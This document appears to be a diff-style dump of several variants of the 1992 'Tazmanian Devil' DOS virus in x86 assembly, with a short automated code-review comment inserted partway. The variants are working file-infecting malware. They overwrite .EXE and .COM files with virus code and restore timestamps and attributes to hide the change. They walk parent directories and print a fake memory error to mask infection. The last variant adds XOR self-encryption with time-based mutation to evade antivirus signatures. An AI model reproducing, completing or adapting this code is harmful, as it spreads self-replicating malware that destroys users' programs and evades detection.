mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,6 ; Are at least 6 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
mov dx,offset virus_msg5
int 21h
mov dx,offset virus_msg6
int 21h
mov dx,offset virus_msg7
int 21h
mov dx,offset virus_msg8
int 21h
mov dx,offset virus_msg9
int 21h
mov dx,offset virus_msg10
int 21h
mov dx,offset virus_msg11
int 21h
mov dx,offset virus_msg12
int 21h
mov dx,offset virus_msg13
int 21h
mov dx,offset virus_msg14
int 21h
mov dx,offset virus_msg15
int 21h
mov dx,offset virus_msg16
int 21h
mov dx,offset virus_msg17
int 21h
mov dx,offset virus_msg18
int 21h
mov dx,offset virus_msg19
int 21h
mov dx,offset virus_msg20
int 21h
mov dx,offset virus_msg21
int 21h
mov dx,offset virus_msg22
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
main endp
code ends
end main

@ -0,0 +1,240 @@
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 562 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
main proc near ; Code execution begins here
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
ret ; Go back to where you came from
virus_code:
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$"
virus_msg1 db cr,lf,tab," ÜÜÜßÜÛÛÛÜ $"
virus_msg2 db cr,lf,tab," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
virus_msg3 db cr,lf,tab," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
virus_msg4 db cr,lf,tab," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
virus_msg5 db cr,lf,tab," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
virus_msg6 db cr,lf,tab," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
virus_msg7 db cr,lf,tab," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
virus_msg8 db cr,lf,tab," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
virus_msg9 db cr,lf,tab," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
virus_msg10 db cr,lf,tab," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
virus_msg11 db cr,lf,tab," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
virus_msg12 db cr,lf,tab," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
virus_msg13 db cr,lf,tab," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
virus_msg14 db cr,lf,tab," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
virus_msg15 db cr,lf,tab," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
virus_msg16 db cr,lf,tab," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
virus_msg17 db cr,lf,tab," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
virus_msg18 db cr,lf,tab," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
virus_msg19 db cr,lf,tab,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
virus_msg20 db cr,lf,tab," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
virus_msg21 db cr,lf,tab," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,16 ; Are at least 16 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
mov dx,offset virus_msg5
int 21h
mov dx,offset virus_msg6
int 21h
mov dx,offset virus_msg7
int 21h
mov dx,offset virus_msg8
int 21h
mov dx,offset virus_msg9
int 21h
mov dx,offset virus_msg10
int 21h
mov dx,offset virus_msg11
int 21h
mov dx,offset virus_msg12
int 21h
mov dx,offset virus_msg13
int 21h
mov dx,offset virus_msg14
int 21h
mov dx,offset virus_msg15
int 21h
mov dx,offset virus_msg16
int 21h
mov dx,offset virus_msg17
int 21h
mov dx,offset virus_msg18
int 21h
mov dx,offset virus_msg19
int 21h
mov dx,offset virus_msg20
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
main endp
code ends
end main

@ -0,0 +1,238 @@
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 2209 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
main proc near ; Code execution begins here
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
ret ; Go back to where you came from
virus_code:
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$"
virus_msg1 db cr,lf,tab," ÜÜÜßÜÛÛÛÜ $"
virus_msg2 db cr,lf,tab," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
virus_msg3 db cr,lf,tab," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
virus_msg4 db cr,lf,tab," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
virus_msg5 db cr,lf,tab," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
virus_msg6 db cr,lf,tab," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
virus_msg7 db cr,lf,tab," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
virus_msg8 db cr,lf,tab," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
virus_msg9 db cr,lf,tab," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
virus_msg10 db cr,lf,tab," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
virus_msg11 db cr,lf,tab," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
virus_msg12 db cr,lf,tab," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
virus_msg13 db cr,lf,tab," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
virus_msg14 db cr,lf,tab," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
virus_msg15 db cr,lf,tab," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
virus_msg16 db cr,lf,tab," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
virus_msg17 db cr,lf,tab," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
virus_msg18 db cr,lf,tab," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
virus_msg19 db cr,lf,tab,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
virus_msg20 db cr,lf,tab," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
virus_msg21 db cr,lf,tab," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,30 ; Is it less than 30 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,2 ; Are at least 2 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
mov dx,offset virus_msg5
int 21h
mov dx,offset virus_msg6
int 21h
mov dx,offset virus_msg7
int 21h
mov dx,offset virus_msg8
int 21h
mov dx,offset virus_msg9
int 21h
mov dx,offset virus_msg10
int 21h
mov dx,offset virus_msg11
int 21h
mov dx,offset virus_msg12
int 21h
mov dx,offset virus_msg13
int 21h
mov dx,offset virus_msg14
int 21h
mov dx,offset virus_msg15
int 21h
mov dx,offset virus_msg16
int 21h
mov dx,offset virus_msg17
int 21h
mov dx,offset virus_msg18
int 21h
mov dx,offset virus_msg19
int 21h
mov dx,offset virus_msg20
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
main endp
code ends
end main
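Review bot: The two comments in `close_file` are swapped relative to the DOS call they feed: INT 21h AH=57h AL=01 takes the time in CX and the date in DX, so `mov cx,orig_time` should read `; Get the time stamp` and `mov dx,orig_date` `; Get the date stamp` — the code is right, the comments are not. The comment on `files_infected` ("BX counts file infected so far") names a register the variable never involves; `; countdown of files/directories still to process` matches the `dec`/`jz`/`jnz` uses in `chdir` and `healthy`. The `mov [bx+6],ah` patch of `compare_buf` is commented as "Adjust the encryption value" although this listing has no encrypt/decrypt routine, so a comment stating which byte of the entry-point image offset 6 is expected to hold in this layout would help a reader verify the comparison.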

@ -0,0 +1,278 @@
cr equ 13 ; This VIRUS was written 12-14-1992
lf equ 10 ; AND QUIT READING MY SOURCE CODE
tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG
virus_size equ 2276 ; QUEERBAIT VIRUS TRACKER WANNA-BE!
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
;---------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
;---------------------------------------------------------------------
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; ---------- Encrypt, save, and restore the virus code -----------
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
call encrypt_decrypt ; Restore the code as it was
ret ; Go back to where you came from
; --------------- Encrypt or decrypt the virus code ----------------
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
;-----------------------------------------------------------------------
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
;-----------------------------------------------------------------------
virus_code:
;----------------------------------------------------------------------------
; All strings are kept here in the file, and automatically encrypted.
; Please don't be a lamer and change the strings and say you wrote a virus.
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
; changes, even when the strings stay the same.
;----------------------------------------------------------------------------
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Program too big to fit in memory $"
virus_msg1 db cr,lf,"*TAKE THE DAY OFF COMPLIMENTS OF THE TAZMANIAN DEVIL AND Âô<C383> W<>sˆl!!* $"
virus_msg2 db cr,lf,"ADH ADH ADH ADH ADH ADHÜÜÜßÜÛÛÛÜADH ADH ADH ADH ADH ADH ADH ADH ADH ADH $"
virus_msg3 db cr,lf,"ADH ADH ADH ADH ADH AÜÛßÜßÛßÜßÛÛÜÛÜ ADH ADH ADH ADH ADH ADH ADH ADH ADH $"
virus_msg4 db cr,lf,"ADH ADH ADH ADH ADH ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜDH ADH ADH ÛÛÛÛÛ ÛÛ ÛÛÛÛÛADH $"
virus_msg5 db cr,lf,"ADH ADH ADH ADßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ ADH ADH ADÛ ADÛ AÛH ADÛ ADH $"
virus_msg6 db cr,lf,"ADH ADH ADH AÛÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßßH ADH ADÛ ADÛÛÛÛH AÛH ADH $"
virus_msg7 db cr,lf,"ADH ADH ADH ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ ÜADH ADÛ ADÛ AÛH ÛDH ADH $"
virus_msg8 db cr,lf,"ADH ADH ADHÜ ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜH ADÛ ADÛ AÛHÛÛÛÛÛADH $"
virus_msg9 db cr,lf,"ADH ADH ADÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜADH ADH ADH ADH ADH $"
virus_msg10 db cr,lf,"ADH ADH AÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛDH ADH ADH ADH ADH $"
virus_msg11 db cr,lf,"ADH ADH ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ ADH ADH ADH ADH$"
virus_msg12 db cr,lf,"ADH ADHÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛAÜÜÛÛÛÛÛÛÛÛÜADH ADH ADH ADH$"
virus_msg13 db cr,lf,"ADH ADÛÛÜÜÛÛÛÝH ADÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝH ADH ADH ADH$"
virus_msg14 db cr,lf,"ADH ADÞÛÜßÛÛÛÛÛÛADHÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ Aßß ÜÛÛÛÛÛÝßßDH ADH ADH ADH$"
virus_msg15 db cr,lf,"ADH ADHßßÜÛÜÜßß ADH ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛßH ADHÛÛÛÝÞÛÛÛ ADH ADH ADH ADH$"
